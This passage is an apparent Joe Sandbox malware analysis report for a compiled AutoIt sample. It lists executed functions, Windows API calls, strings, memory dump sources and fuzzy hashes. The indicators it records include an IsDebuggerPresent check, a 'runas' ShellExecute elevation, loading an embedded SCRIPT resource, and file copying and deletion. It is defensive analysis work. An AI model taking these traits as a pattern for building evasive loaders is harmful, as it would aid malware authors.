Mailbox 59 API calls 111999->112003 112000 467869 112002 420db6 Mailbox 59 API calls 112000->112002 112001->112009 112002->112011 112005 46787d 112003->112005 112004->112011 112012 46746b 59 API calls Mailbox 112005->112012 112006 420db6 Mailbox 59 API calls 112006->111992 112008 467889 112013 405a15 61 API calls Mailbox 112008->112013 112009->111999 112009->112000 112009->112011 112011->112006 112012->112008 112013->112011 112015 4055a2 112014->112015 112016 40557d 112014->112016 112017 407d8c 59 API calls 112015->112017 112016->112015 112020 40558c 112016->112020 112018 46325e 112017->112018 112023 46328d 112018->112023 112041 4631fa ReadFile SetFilePointerEx 112018->112041 112042 407924 59 API calls 2 library calls 112018->112042 112021 405ab8 59 API calls 112020->112021 112024 46337e 112021->112024 112023->111839 112025 4054d2 61 API calls 112024->112025 112026 46338c 112025->112026 112028 46339c Mailbox 112026->112028 112043 4077da 61 API calls Mailbox 112026->112043 112028->111839 112030 409a87 112029->112030 112031 409a48 112029->112031 112032 408047 59 API calls 112030->112032 112033 420db6 Mailbox 59 API calls 112031->112033 112034 409a5b 112032->112034 112033->112034 112034->111843 112035->111815 112036->111844 112037->111818 112038->111818 112039->111837 112040->111842 112041->112018 112042->112018 112043->112028 112045 407667 59 API calls 112044->112045 112046 45f414 112045->112046 112047 407a16 59 API calls 112046->112047 112048 45f428 112047->112048 112049 45f167 61 API calls 112048->112049 112054 45f44a 112048->112054 112051 45f444 112049->112051 112050 45f167 61 API calls 112050->112054 112052 40784b 59 API calls 112051->112052 112051->112054 112052->112054 112053 40784b 59 API calls 112053->112054 112054->112050 112054->112053 112059 407b2e 59 API calls 112054->112059 112061 45f4c4 112054->112061 112055 40784b 59 API calls 112056 45f4dd 112055->112056 112057 407b2e 59 API calls 112056->112057 112058 45f4e9 112057->112058 112060 407f77 59 API calls 112058->112060 112062 45f4f8 Mailbox 112058->112062 112059->112054 112060->112062 112061->112055 112062->111881 112063->111935 112064->111897 112065->111933 112066->111933 112067->111967 112069 4560e8 112068->112069 112070 4560cb 112068->112070 112069->111976 112070->112069 112072 4560ab 59 API calls Mailbox 112070->112072 112072->112070

                      Executed Functions

                      Function 02F7CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: d$w
                      • API String ID: 0-2400632791
                      • Opcode ID: 378f68918cc0b3db45ddcf6f9755583a86a421057d9099b696362869345d0b54
                      • Instruction ID: 103abd3e9a3807fd7d6031e97e4ce82358cddec753ab692de6e35a18aaa822c6
                      • Opcode Fuzzy Hash: 378f68918cc0b3db45ddcf6f9755583a86a421057d9099b696362869345d0b54
                      • Instruction Fuzzy Hash: 95C13922E0C340AEEB354A64CC09B397B65AB52BECF4D056BE746CA1F2D7658804CB52
                      Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                      • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                        • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                      • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                        • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                        • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                        • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                        • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                        • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                        • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                        • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                        • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                        • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                        • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                        • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                        • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                        • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                      • String ID: This is a third-party compiled AutoIt script.$runas$%I
                      • API String ID: 529118366-2806069697
                      • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                      • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                      • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                      • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                      Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2065 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2070 404a06 2065->2070 2071 404b0b-404b0d 2065->2071 2073 404a09-404a0e 2070->2073 2072 43d767-43d773 2071->2072 2074 43d774-43d778 2072->2074 2075 404b12-404b13 2073->2075 2076 404a14 2073->2076 2078 43d77b-43d787 2074->2078 2079 43d77a 2074->2079 2077 404a15-404a4c call 407d2c call 407726 2075->2077 2076->2077 2087 404a52-404a53 2077->2087 2088 43d864-43d867 2077->2088 2078->2074 2081 43d789-43d78e 2078->2081 2079->2078 2081->2073 2083 43d794-43d79b 2081->2083 2083->2072 2085 43d79d 2083->2085 2089 43d7a2-43d7a5 2085->2089 2087->2089 2090 404a59-404a64 2087->2090 2091 43d880-43d884 2088->2091 2092 43d869 2088->2092 2093 404a93-404aaa GetCurrentProcess IsWow64Process 2089->2093 2094 43d7ab-43d7c9 2089->2094 2095 43d7ea-43d7f0 2090->2095 2096 404a6a-404a6c 2090->2096 2099 43d886-43d88f 2091->2099 2100 43d86f-43d878 2091->2100 2097 43d86c 2092->2097 2101 404aac 2093->2101 2102 404aaf-404ac0 2093->2102 2094->2093 2098 43d7cf-43d7d5 2094->2098 2107 43d7f2-43d7f5 2095->2107 2108 43d7fa-43d800 2095->2108 2103 404a72-404a75 2096->2103 2104 43d805-43d811 2096->2104 2097->2100 2105 43d7d7-43d7da 2098->2105 2106 43d7df-43d7e5 2098->2106 2099->2097 2109 43d891-43d894 2099->2109 2100->2091 2101->2102 2110 404ac2-404ad2 call 404b37 2102->2110 2111 404b2b-404b35 GetSystemInfo 2102->2111 2112 43d831-43d834 2103->2112 2113 404a7b-404a8a 2103->2113 2115 43d813-43d816 2104->2115 2116 43d81b-43d821 2104->2116 2105->2093 2106->2093 2107->2093 2108->2093 2109->2100 2122 404ad4-404ae1 call 404b37 2110->2122 2123 404b1f-404b29 GetSystemInfo 2110->2123 2114 404af8-404b08 2111->2114 2112->2093 2121 43d83a-43d84f 2112->2121 2118 404a90 2113->2118 2119 43d826-43d82c 2113->2119 2115->2093 2116->2093 2118->2093 2119->2093 2124 43d851-43d854 2121->2124 2125 43d859-43d85f 2121->2125 2130 404ae3-404ae7 GetNativeSystemInfo 2122->2130 2131 404b18-404b1d 2122->2131 2126 404ae9-404aed 2123->2126 2124->2093 2125->2093 2126->2114 2128 404aef-404af2 FreeLibrary 2126->2128 2128->2114 2130->2126 2131->2130
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004049CD
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                      • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                      • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                      • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                      • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                      • String ID:
                      • API String ID: 1986165174-0
                      • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                      • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                      • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                      • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                      Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2132 404e89-404ea1 CreateStreamOnHGlobal 2133 404ec1-404ec6 2132->2133 2134 404ea3-404eba FindResourceExW 2132->2134 2135 43d933-43d942 LoadResource 2134->2135 2136 404ec0 2134->2136 2135->2136 2137 43d948-43d956 SizeofResource 2135->2137 2136->2133 2137->2136 2138 43d95c-43d967 LockResource 2137->2138 2138->2136 2139 43d96d-43d975 2138->2139 2140 43d979-43d98b 2139->2140 2140->2136
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                      • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                      • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                      • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                      • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                      • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                      • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                      Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: pbL$%I
                      • API String ID: 3964851224-1578263234
                      • Opcode ID: f39f8334b77e57f09a93afb6d734b6dfda5cd7ecc27434c235e41694184fbe06
                      • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                      • Opcode Fuzzy Hash: f39f8334b77e57f09a93afb6d734b6dfda5cd7ecc27434c235e41694184fbe06
                      • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                      Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                      • API String ID: 0-2838938394
                      • Opcode ID: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                      • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                      • Opcode Fuzzy Hash: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
                      • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                      Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                      • FindClose.KERNEL32(00000000), ref: 0046448B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                      • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                      • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                      • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                      Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                      Download Yara Rule
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                      • timeGetTime.WINMM ref: 00410D16
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                      • Sleep.KERNEL32(0000000A), ref: 00410E61
                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                      • DestroyWindow.USER32 ref: 00410F06
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                      • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                      • TranslateMessage.USER32(?), ref: 00445C60
                      • DispatchMessageW.USER32(?), ref: 00445C6E
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                      • API String ID: 4212290369-1082885916
                      • Opcode ID: 1d56dc0301da9218f0dfd79e4aeca75a1c82d79ff43336c094143f62481f1745
                      • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                      • Opcode Fuzzy Hash: 1d56dc0301da9218f0dfd79e4aeca75a1c82d79ff43336c094143f62481f1745
                      • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                      Function 02F78550 Relevance: 20.0, APIs: 13, Instructions: 515COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLastwsprintf
                      • String ID:
                      • API String ID: 2587402804-0
                      • Opcode ID: 4bd4bf10f1c3810d56c3cb94e8b8786a7ae720bc94708982795d1ae5cc6f19ef
                      • Instruction ID: 46a9f3af92a05c54ffccb94bf3193eb247147a80b62d24dc45f124c2f02a5965
                      • Opcode Fuzzy Hash: 4bd4bf10f1c3810d56c3cb94e8b8786a7ae720bc94708982795d1ae5cc6f19ef
                      • Instruction Fuzzy Hash: 0CF13D21E5C3809EEB3557284C0CB76BBA15F526F8F4C079BE756CA1F2D7648804F262
                      Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1109 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1122 46920b-469212 call 469734 1109->1122 1123 4692b8-4692bf call 469734 1109->1123 1128 4692c1-4692c3 1122->1128 1129 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1122->1129 1123->1128 1130 4692c8 1123->1130 1131 46952a-46952b 1128->1131 1133 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1129->1133 1130->1133 1136 469548-469558 call 405211 1131->1136 1168 469390-4693ab call 468fa5 1133->1168 1169 469389-46938b 1133->1169 1172 4693b1-4693b9 1168->1172 1173 46943d-469449 call 4253a6 1168->1173 1169->1131 1175 4693c1 1172->1175 1176 4693bb-4693bf 1172->1176 1180 46945f-469463 1173->1180 1181 46944b-46945a DeleteFileW 1173->1181 1177 4693c6-4693e4 call 404f0b 1175->1177 1176->1177 1185 4693e6-4693eb 1177->1185 1186 46940e-469424 call 468953 call 424863 1177->1186 1183 469505-469519 CopyFileW 1180->1183 1184 469469-4694f2 call 4240bb call 4699ea call 468b06 1180->1184 1181->1131 1188 46952d-469543 DeleteFileW call 4698a2 1183->1188 1189 46951b-469528 DeleteFileW 1183->1189 1184->1188 1205 4694f4-469503 DeleteFileW 1184->1205 1191 4693ee-469401 call 4690dd 1185->1191 1202 469429-469434 1186->1202 1188->1136 1189->1131 1200 469403-46940c 1191->1200 1200->1186 1202->1172 1204 46943a 1202->1204 1204->1173 1205->1131
                      APIs
                        • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                        • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                      • __wsplitpath.LIBCMT ref: 00469234
                        • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                      • _wcscpy.LIBCMT ref: 00469247
                      • _wcscat.LIBCMT ref: 0046925A
                      • __wsplitpath.LIBCMT ref: 0046927F
                      • _wcscat.LIBCMT ref: 00469295
                      • _wcscat.LIBCMT ref: 004692A8
                        • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                        • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                      • _wcscmp.LIBCMT ref: 004691EF
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                        • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                      • _wcsncpy.LIBCMT ref: 004694C5
                      • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 1500180987-0
                      • Opcode ID: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
                      • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                      • Opcode Fuzzy Hash: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
                      • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                      Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • RegisterClassExW.USER32(00000030), ref: 0040309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • LoadIconW.USER32(000000A9), ref: 004030F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
